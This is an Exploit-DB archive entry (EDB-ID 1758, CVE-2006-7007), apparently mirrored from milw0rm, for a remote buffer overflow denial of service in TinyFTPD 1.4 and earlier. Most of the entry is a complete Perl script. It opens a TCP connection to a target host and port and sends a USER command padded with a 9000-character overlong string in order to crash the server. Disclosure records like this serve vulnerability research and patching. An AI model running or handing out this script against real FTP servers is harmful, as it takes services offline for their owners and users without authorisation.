TinyFTPD <= 1.4 USER Remote Buffer Overflow DoS

2006-05-06T00:00:00
ID EDB-ID:1758
Type exploitdb
Reporter [Oo]
Modified 2006-05-06T00:00:00

Description

TinyFTPD <= 1.4 (USER) Remote Buffer Overflow DoS. CVE-2006-7007. Dos exploit for windows platform

                                        
                                            #!/bin/perl
#
# Title: TinyFTPD &lt;= 1.4 USER command D.O.S
# Credits: [Oo]
#
#
use IO::Socket;

print "[i] TinyFTPD &lt;= 1.4 USER command D.O.S\n";
print "[i] coded by [Oo]\n";


if (@ARGV &lt; 2)
{
 print "\n[*] Usage: tinyftpd_dos.pl host port\n";
 print "[*] Exemple: tinyftpd_dos.pl 192.168.0.1 21\n";
 exit;
}


$ip = $ARGV[0];
$port = $ARGV[1];

$exploit = "(A" x 9000;

$socket = IO::Socket::INET-&gt;new( Proto =&gt; "tcp", PeerAddr =&gt; "$ip", PeerPort =&gt; "$port") || die "\n[-] Connecting: Failed!\n";
print "\n[+] Connecting: Ok!\n";
print "[+] Sending bad request...\n";

print $socket "USER $exploit\n";
sleep(5);
close($socket);

print "[?] DoSed?\n";

# milw0rm.com [2006-05-06]